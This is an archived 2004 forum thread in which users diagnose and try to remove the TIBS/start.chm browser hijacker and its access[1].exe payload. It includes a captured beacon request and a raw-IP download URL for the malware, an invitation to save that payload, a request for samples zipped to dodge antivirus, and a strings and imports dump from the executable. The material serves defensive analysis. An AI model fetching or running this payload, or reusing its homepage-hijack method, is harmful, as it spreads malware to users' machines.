Had this? " mk:@MSITStore:C:\WINDOWS\start.chm::/start.html"

TIBS? Start.chm? Access[1].exe?

Hey all,

Something isn't right here. I've been hit with that mkstore problem that auto-executes rubbish on your system. Except this one just won't go away.

You know the problem I'm talking about, so let me get right to it. First, I think creating a write protected 0 byte start.chm file prevents the thing from "infecting" your machine, but not running access[1].exe - killing the access[1].exe task prevents it from coming back. Second, I've seen a new variant of this which runs a cmd.exe that takes 100% cpu - killing that solves the problem.

In brief. I've run ad-aware, spybot and hijack this. I know what I'm doing and the hijack this output shows nothing unusual. I tried to procdump the exe and disassemble it, but all I got was a load of garbage. I haven't tried softice on it yet.

Does anyone know exactly how to confirm whether this thing is still on my machines, or whether it's just coming back when I'm browsing sites? If I know it's not there then I can at least start from a "known good" point when hacking it apart.

An observation... It seems to return shortly after I go to EBay, which is somewhat interesting. Also if you boot up, use the system normally but don't run IE, the spyware doesn't start which leads me to believe it's either some cleverly hidden browser hook (which I really doubt), it's a hidden task that waits for iexplore.exe to load (which is possible, if the footprint is small enough the process won't show up), or it's coming back when browsing to a website.

Any help on confirming it's not on my system is appreciated. Then I'll attack this little POS with my trusty copy of wdasm... Rule #1 for whatever idiot wrote this, never annoy a coder.

 

Re: TIBS? Start.chm? Access[1].exe?

If you mean the one posted at April 22nd, 2004, 04:47 AM by Unzy, titled

"Re: CWS Variants
start.chm / MSITStore (MasterSearch)

A new type of CWS variant that uses an exploit to reset a user's homepage."

That doesn't help much . I don't have those browser pages set, and the thing keeps coming back.

I'm just not convinced that by removing the chm, the .exe process and the pages it removes the spyware. It's coming back somehow, and unless Ebay or Yahoo are using it then it's got to be from the local machine.

 

Re: TIBS? Start.chm? Access[1].exe?

Nothing there except an interesting batch file that doesn't do anything...

 

Re: TIBS? Start.chm? Access[1].exe?

Hey guest, I noticed that even with cwshredder & hjthis clean & no start.chm file present, the thing seems to do this: when any app initially connects to the internet, or any type of help file is accessed, shortly afterward an additional TCP connect is made under that process to an IP in Russia, which then closes quickly, you can't see it with netstat, I used Port Explorer to watch it and identify the IP (which is the same each time).

I'm beginning to think it may be able to eventually download the new start.chm & registry crap after repeating this with virtually every process that connects to the net.

Anyway, since I blocked the IP range 81.211.105.* from leaving my router & banned the IP range from incoming at my computer firewall, none of the start.chm or registry crap has reappeared (5 days now). The critter still trys to call home with each process that accesses the net, but it can't get out anymore. If you use a tool like Port Explorer you should be able to see it on your machine. Hope this helps.

 

Re: TIBS? Start.chm? Access[1].exe?

Interesting, thanks for adding that.

Next time it happens, can you try using FPORT on it? FPort maps network connections to processes & files, you can get it from Foundstone (http://www.foundstone.com/knowledge/proddesc/fport.html). That will tell you what is making the outgoing connection...

 

Re: TIBS? Start.chm? Access[1].exe?

I think you guys might be on to something here. I've had the same inability to completly remove this virus. I get everything cleaned up, and as soon as I reboot, Spyware Guard tells me something is trying to change my home page again. After reading this post, it hit me that this occurs right after my startup process starts something called NIS Time, which is a software tool to check/set the system time. This is the first time anything on my pc tries to go out over the net.

I downloaded Fport and tried running it. I get the following results:


FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid Process Port Proto Path
284 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
4 System -> 139 TCP
4 System -> 445 TCP
992 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
4 System -> 1026 TCP
1660 Explorer -> 1355 TCP C:\WINDOWS\Explorer.EXE
1624 -> 5000 TCP
3084 aim -> 5180 TCP C:\Program Files\AIM95\aim.exe

0 System -> 123 UDP
0 System -> 137 UDP
0 System -> 138 UDP
284 svchost -> 445 UDP C:\WINDOWS\system32\svchost.exe
4 System -> 1027 UDP
1660 Explorer -> 1032 UDP C:\WINDOWS\Explorer.EXE
1624 -> 1100 UDP
992 svchost -> 1148 UDP C:\WINDOWS\System32\svchost.exe
0 System -> 1900 UDP
3084 aim -> 1900 UDP C:\Program Files\AIM95\aim.exe

What I'm not clear on is how I could use this tool to see what is trying to get to the russian ip address. Fprot seems to take a snapshot of port ownership. If something is grabbing a port to reach out to the russian ip, then almost immediately releases that port, how would this catch it? I'm wondering if I should download and try ZoneAlarm. If I recall, you can set that so anything that tries to access the net will get flagged and held up pending permission.

Tim

 

Re: TIBS? Start.chm? Access[1].exe?

Ok, I installed Zone Alarm and set it to require permissions before anything goes out over the internet. I disabled my NISTIME because of timing problems - it seemed to want to do its thing before ZoneAlarm was fully initialized. The following files requested access to the internet as part of start up processes:

svchost.exe
explorer.exe
msbntray.exe

The Spygware Guard message about my home page being changed popped up after I granted access for explorer.exe to use the net. I wonder if the virus is somehow attaching to that file?

Tim

 

Re: TIBS? Start.chm? Access[1].exe?

Derek, which PV option was that? I think I was asked to use option 1 and option 7 at different points. Whichever is the right one, I'd like to try again if you don't mind since explorer.exe seems to want to talk to the internet.

Thanks. Want me to post the results back over in my own thread?

Tim

 

Re: TIBS? Start.chm? Access[1].exe?

I don't think you will see it with FPROT. PE shows real time events as they happen, and logs the events, second by second.

The TCP connect happens, then exactly 21 seconds later it closes. The same process that made the net connection (for example, iexplore.exe) same PID, is the process that does the connect to the Russian IP but on another local port (looks like the next available port), and with 0.0.0.0 local address rather than 192.168.x.x

If I have the Ruskie IP blocked from outgoing to the WAN at the router, the Ruskie port closes 21 seconds after it opens and thats all. If the Ruskie IP is not blocked from outgoing to the WAN, the Ruskie port closes 21 seconds after it opens, AND THEN for a few minutes the remote Ruskie IP port 80 will try some incoming connects to my computer (2 times on three different ports, then quit). The incoming attempts are blocked at my firewall and logged there since I've got the IP entered as an incoming banned IP.

It's not only iexplore.exe connecting to the net that gets the Ruskie IP in action, but also other stuff like mcafee security center processes that connect to the net.

I'm getting kinda blurry-eyed from looking at these logs & stuff now, but maybe I ought to run some kind of dll checks sometime and have the guys here check 'em out.

 

Re: TIBS? Start.chm? Access[1].exe?

Microsoft has released an update to help solve this problem.
ore info can be found here. http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx
.

 

Re: TIBS? Start.chm? Access[1].exe?

The same thing is happening to me. Since I created the readonly start.chm and start.html files, my browser isn't being hijacked anymore. But I'm still getting the access[1].exe files and the high-CPU cmd.exe's.

I installed Port Explorer, and am seeing the same behaviour DB123 described -- namely, normal connections are followed by a connection to 81.211.105.70.

With Port Explorer, I was able to see what was in those connections:

GET /report/reportsync.php?cid=64446bc9-e268-4a54-8597-ec057ab4dcfc
HTTP/1.1
Accept: */*
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: main.tibssystems.com
Connection: Keep-Alive

This downloads access.exe, which gets stored in the cache and executed as access[1].exe.

You can get the access.exe file by going directly to http://81.211.105.70/report/reportsync.php. Obviously, just save it. Can someone disassemble it and tell us what it's latching itself onto so that we can get rid of it once and for all?

 

Re: TIBS? Start.chm? Access[1].exe?

Can anyone get me a sample of the access[1].exe ?

I think it holds the solution to this mystery.

(Got plenty, thanks to all that submitted)
Preferably zipped up, so it doesn't get intercepted by any AV-scanners.

Regards,

Pieter

 

Re: TIBS? Start.chm? Access[1].exe?

I too have this hacker omy PC and have been frustrated because it's unknown how to remove all components and all suggested solutions are about hiding the symptoms rather than curing the disease.

I don't want to take over tghis posting, just wanted to say that this is the most convincing posting I've seen in terms of finding a solution and wish you guys well.

 

Re: TIBS? Start.chm? Access[1].exe?

Okay, I'm at work at the minute but wanted to add this.

If anyone can send me the flat access[1].exe file, I can disassemble it. Alternatively we need to find out how it gets launched. The reason for this is as follows.

The aim is to get the exe in a "virgin" state on disk to disassemble. Simply ripping it out of memory with procdump won't do this as the exe will by definition change its internal states as it executes.

What we need to do is to find the launch point. When we know that, we can set a bpx (breakpoint in execution) in Softice, and find the first line of code of the exe. We then change that to a jmp esi, which puts it in an infinite loop. Then we can use procdump to get a virgin copy that can be disassembled. It's the same technique used to reverse engineer upx'd & compressed exe's.

The post above about the php file is very promising. What's annoying is I patched hh.exe (the CHM file reader for Windows) to prompt whenever a CHM file was executed - it didn't warn me, but access[1].exe came back. So the comment I read elsewhere about preventing chm files from being launchable doesn't seem to hold true.

Are there any other coders/reverse engineers/crackers here that can work with me on this?

 

Re: TIBS? Start.chm? Access[1].exe?

I found 5 ACCESS[1].EXE-*.pf files in my c:\windows\prefetch dir that might help...

 

Re: TIBS? Start.chm? Access[1].exe?

Gurth, thanks for the offer but the -pf is junk. Rakewell got it in 1, download that with a dl manager (getright, flashget), rename it to an exe and it's a valid PE file.

Here's a start, don't have much time right now but I'll set up a sandbox and start hitting this POS. It was coded with Visual C++ (VC6 I believe). Here's some interesting strings in the table (just look at the end of the line, the start is the offset and the type). THe worrying one is "wininet.dll", it might be patching it. My wininets are all the right size & date, so perhaps Windows FileProt fixed it for me...

24672,Char,11,tibsystems.
24684,Char,13,statsbank.com
24700,Char,15,boards.cexx.org
24716,Char,22,adultwebmasterinfo.com
24740,Char,12,spywareinfo.
24756,Char,15,dialerschutz.de
24772,Char,18,webmasterworld.com
24804,Char,18,go****yourself.com
24824,Char,17,FindCloseUrlCache
24844,Char,22,FindNextUrlCacheEntryA
24868,Char,23,FindFirstUrlCacheEntryA
24892,DLL,11,wininet.dll
24970,Char,22,if exist %1 goto start
25012,Char,41,SOFTWARE\Microsoft\Internet Explorer\Main
25056,Char,10,Start Page
25068,Char,13,::/start.html
25084,Char,14,mkMSITStore:
25100,Char,10,\start.chm
37287,Char,11,/$FIftiMain
37318,Char,15,/arrow_left.gif
37340,Char,16,/arrow_right.gif
37363,Char,13,/ham01000.jpg
37383,Char,13,/ham01001.jpg
37403,Char,13,/ham01100.jpg
37423,Char,13,/ham01200.jpg
37443,Char,13,/ham01300.jpg
37463,Char,13,/ham01400.jpg
37483,Char,13,/ham01500.jpg
37503,Char,13,/ham01600.jpg
37523,Char,13,/ham01700.jpg
37543,Char,13,/ham01800.jpg
37563,Char,13,/ham01900.jpg
37583,Char,13,/ham02000.jpg
37603,Char,13,/ham02001.jpg
37623,Char,13,/ham02100.jpg
37643,Char,13,/ham02200.jpg
37663,Char,13,/ham03000.jpg
37683,Char,13,/ham04000.jpg
37703,Char,13,/ham05000.jpg
37723,Char,13,/ham06000.jpg
37743,Char,13,/ham07000.jpg
37763,Char,13,/ham08000.jpg
37783,Char,13,/ham09000.jpg
37818,Char,13,/mo000000.jpg
37853,Char,12,/poker_t.gif
37872,Char,11,/start.html
37889,Char,13,/sto00000.gif
37909,Char,13,/to000000.jpg
37929,Char,20,:ataSpace/NameList
37951,Char,42,<ataSpace/Storage/MSCompressed/Content
37998,Char,46,P,:ataSpace/Storage/MSCompressed/ControlData
38047,Char,42,):ataSpace/Storage/MSCompressed/SpanInfo
38092,Char,48,/:ataSpace/Storage/MSCompressed/Transform/List
38141,Char,98,<&_:ataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/
38242,Char,106,i:ataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable
41266,Unichar,12,Uncompressed
41294,Unichar,12,MSCompressed
41320,Unichar,19,{7FC28940-9D31-11D0
41474,Char,21,HHA Version 4.74.8702
41540,Char,10,start.html
70070,Char,10,vs3+)&Op
83737,Char,11,S7K$Lj9SVlX


Here are the interesting imports:

22006,Function,11,FreeLibrary
22020,Function,14,GetProcAddress
22038,Function,12,LoadLibraryA
22066,Function,14,FindFirstFileA
22096,Function,12,GetTickCount
22124,Function,12,GetTempPathA
22140,Function,23,GetEnvironmentVariableA
22166,Function,18,GetModuleFileNameA
22200,Function,11,CloseHandle
22226,Function,11,CreateFileA
22240,Function,12,LockResource
22256,Function,12,LoadResource
22272,Function,13,FindResourceA
22296,Function,14,SizeofResource
22326,Function,14,GetProcessHeap
22354,DLL,12,KERNEL32.dll
22370,Function,21,GetKeyboardLayoutList
22392,DLL,10,USER32.dll
22406,Function,11,RegCloseKey
22420,Function,14,RegSetValueExA
22438,Function,13,RegOpenKeyExA
22452,DLL,12,ADVAPI32.dll
22468,Function,13,ShellExecuteA
22482,DLL,11,SHELL32.dll
22496,Function,16,GetModuleHandleA
22516,Function,15,GetStartupInfoA
22534,Function,15,GetCommandLineA
22552,Function,10,GetVersion
22566,Function,11,ExitProcess
22580,Function,16,TerminateProcess
22600,Function,17,GetCurrentProcess
22620,Function,24,UnhandledExceptionFilter
22648,Function,23,FreeEnvironmentStringsA
22674,Function,23,FreeEnvironmentStringsW
22700,Function,19,WideCharToMultiByte
22722,Function,21,GetEnvironmentStrings
22746,Function,22,GetEnvironmentStringsW
22772,Function,14,SetHandleCount
22790,Function,12,GetStdHandle
22806,Function,11,GetFileType
22820,Function,13,GetVersionExA
22836,Function,11,HeapDestroy
22850,Function,10,HeapCreate
22864,Function,11,VirtualFree
22890,Function,12,VirtualAlloc
22906,Function,11,HeapReAlloc
22954,Function,19,MultiByteToWideChar
22976,Function,12,LCMapStringA
22992,Function,12,LCMapStringW
23008,Function,14,GetStringTypeA
23026,Function,14,GetStringTypeW

 

Re: TIBS? Start.chm? Access[1].exe?

Okay, I'm convinced we're missing something. The only sites I've been to have been known-good ones. So unless this site, Ebay, yahoo or NukeCops are causing this spyware to be downloaded, it's still on my machine.

Anyone got any ideas? There's no point disasm'ing this thing if I can't get it cleaned...

 

Re: TIBS? Start.chm? Access[1].exe?

Another possibility. I think EBay may be involved. I tracked down the copy of Access[1].exe to the exact time I was logged into my ebay UK account. In Ebay UK "My Account", there is a banner advert top-center of the page - I'm wondering if one of the adverts they show is causing this hijack.

Incidentally you won't be able to find the exe in the IE cache/history, you'll have to reboot and delete everything in your profile/local settings/temporary internet files from a cmd prompt or non-Explorer tool (such as DOpus).

Can anyone with an EBay UK account keep an eye out and see if they see anything similar?

 

Re: TIBS? Start.chm? Access[1].exe?

It's nothing specific to eBay.

The hacker waits until you connect to the internet then downloads it stuff. If you make a connection using say Outlook hooked up to your hotmail account you'll experience the same problem.

Read around and look at the many other postings on this virus and you'll see what people are discovering about this new pest.

 

Re: TIBS? Start.chm? Access[1].exe?

It could be anything. Maybe a banner that eBay is displaying, or maybe something in a person's ad. I don't know.

What concerns me more is the possibility that the infection (the part that makes IE go pull down that php file) comes from a difference source, and access[1].exe doesn't actually infect machines. In which case, reverse engineering access[1].exe won't tell us how to make IE stop pulling it down.

Maybe all access[1].exe does is pop up the $3.5 million lottery window via cmd.exe? (I've always killed cmd.exe to get rid of that popup, so I don't know what happens when you click either button.)

Actually, what you posted doesn't include the string about $3.5M, but it was in another post here where someone posted their results of disassembling access.exe. I wonder if there are multiple versions or if it mutates? What's the md5 hash one the version you've got? (I'm not sure how to get the hash in plain Windows. I've got cygwin and it includes md5sum.)

The hash on the version I have is: f56b2442dcd2f553b2fdd060c00bf99e